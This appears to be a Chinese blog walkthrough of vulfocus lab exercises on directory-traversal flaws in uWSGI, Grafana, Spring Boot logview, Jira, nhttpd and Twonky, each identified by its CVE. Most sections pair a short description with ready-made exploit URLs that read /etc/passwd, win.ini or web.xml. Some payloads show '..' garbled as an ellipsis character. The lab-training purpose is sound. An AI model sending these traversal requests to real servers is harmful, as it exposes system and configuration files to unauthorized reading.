vulfocus靶场通关(目录遍历)

最新推荐文章于 2024-06-09 02:48:17 发布
最新推荐文章于 2024-06-09 02:48:17 发布
阅读量2.2k 收藏 8
点赞数 2
分类专栏: 靶场 文章标签: 数据库 网络安全 目录遍历漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/123023770
版权

uWSGI 目录穿越(CVE-2018-7490)

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

在这里插入图片描述

exploit

http://IP:port/…%2f…%2f…%2f…%2f/etc/passwd
在这里插入图片描述

grafana 目录遍历 (CVE-2021-43798)

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。
在这里插入图片描述

exploit

http://IP:port/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

在这里插入图片描述
在这里插入图片描述

Spring Boot 目录遍历 (CVE-2021-21234)

Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。 spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。
在这里插入图片描述

exploit

此漏洞存在于日志文件查看器
路径:http://IP:port/manage/log/
Windows路径:
manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ 
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ 
Linux路径:
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../

在这里插入图片描述

Atlassian Jira 路径遍历 (CVE-2021-26086)

Atlassian JIRA是一个项目管理和开发管理工具,Atlassian Jira 服务器和数据中心版本允许远程攻击者通过 /WEB-INF/web.xml 端点中的路径遍历漏洞读取特定文件。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。

exploit

/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

在这里插入图片描述
在这里插入图片描述

nhttpd 目录遍历 (CVE-2011-0751)

Nostromo nhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 nhttpd(又名 Nostromo 网络服务器)中的目录遍历漏洞允许远程攻击者通过 URI 中的 …%2f(编码点点斜线)执行任意程序或读取任意文件 在其根目录下访问/…%2flogs/access_log,即可查看log。

exploit

http://IP:port/…%2flogs/access_log
http://IP:port/…%2fetc/passwd
在这里插入图片描述
在这里插入图片描述

twonkyserver 目录遍历 (CVE-2018-7171)

LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘…’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。

exploit

http://IP:port/rpc/set_all
http://IP:port/rpc/dir?path=

在这里插入图片描述
在这里插入图片描述

0x717866
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
红队专题-漏扫-Xray
aming小老弟
03-08 1109
Xray扫描器是一款功能强大的安全评估工具,它主要使用HTTP/HTTPS代理进行被动扫描。这款工具由多名经验丰富的一线安全从业者开发,具备多种特性使其在安全扫描和漏洞检测方面表现出色。Xray扫描器支持多种扫描和检测模块,包括SQL注入检测、命令注入检测、任意重定向检测、路径遍历模块等。此外,它还具有一些内置插件,如XSS漏洞检测、XML实体注入检测等,这些插件能够进一步提升其漏洞检测能力。在使用Xray扫描器时,可以通过开启监听、设置浏览器代理等方式,使其能够自动探测访问网站的漏洞
目录穿越漏洞CVE-2018-7171复现 又学到一招小技巧!!!!
最新发布
helloKittywz的博客
06-09 284
还是半夜睡不着,打开靶机开始操作。今天看了文件下载和目录穿越漏洞想结合以及防御方法。半夜来进行操作一波。复现一下漏洞开始操作起来!!!进入到页面,开始找细节,然后看了前面的提示操作,我前面也是以为要使用contentbases这个参数来进行访问。没有找到我想要的东西然后加上我前面说的那个参数没有找到的操作????我就在仔细去看,是要使用什么rpc/set_all发送带../序列的那个参数来进行操作的然后我去百度知道了rpc这个是远程过程调用的协议。说简单一点就是可以进行远程访问的操作。
vulfocus/log4j2-rce-2021-12-09:latest通关
qq_44122254的博客
12-28 5129
别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造payload 执行之后看一下这边的解析记录,存在此漏洞 好了,继续靶场复现 漏洞存在后,进行反弹shell,进一步利用,这里用到了一个工具**JND
近两年常用的RCE漏洞收集
Websec
04-11 5398
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 985
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
Apache Flink目录遍历漏洞(REST API读/写远程文件)
crowsec
02-10 1426
CVE-2020-17518复现
grafana 目录遍历CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-26 1万+
漏洞名称: grafana 目录遍历CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
apache flink目录遍历漏洞CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1303
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
"Docker简单搭建Vulfocus靶场" Docker是一个流行的容器化平台,能够轻松地搭建和管理各种应用程序。Vulfocus是一个基于Docker的靶场平台,提供了大量的漏洞靶场环境,方便安全研究人员和渗透测试人员进行漏洞研究和...
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
Apache Flink路径遍历 (CVE-2020-17519)
qq_41132792的博客
05-11 893
Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Vulfocus-Spring 目录遍历CVE-2020-5410 )
qq_41819939的博客
07-29 500
SpringCloudConfig是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本。...
Apache Flink 目录遍历
自强不息
05-05 240
​我举手向苍穹,并非一定要摘星取月,我只是需要这个向上的、永不臣服的姿态。
漏洞复现-twonkyserver-目录遍历vulfocus/twonkyserver-cve_2018_7171
10-15 745
【twonkyserver-目录遍历】读取文件
Nostromo nhttpd系列漏洞利用以及总结
jammny
10-23 1642
前言: Nostromonhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 Nostromo 目录遍历(CVE-2011-0751) 漏洞详情: 1.9.4之前版本中存在目录遍历漏洞。远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。 影响版本: versions <= 1.9.4 POC: #!/bin/sh if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST P..
Grafana任意文件读取漏洞(CVE-2021-43798)复现
小小猪的博客
12-24 2204
Grafana任意文件读取漏洞(CVE-2021-43798)复现 漏洞描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 漏洞影响范围: Grafana 8.0.0 - 8.3.0 环境搭建: 采用vulfocus靶场 地址 漏洞复现: ...
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值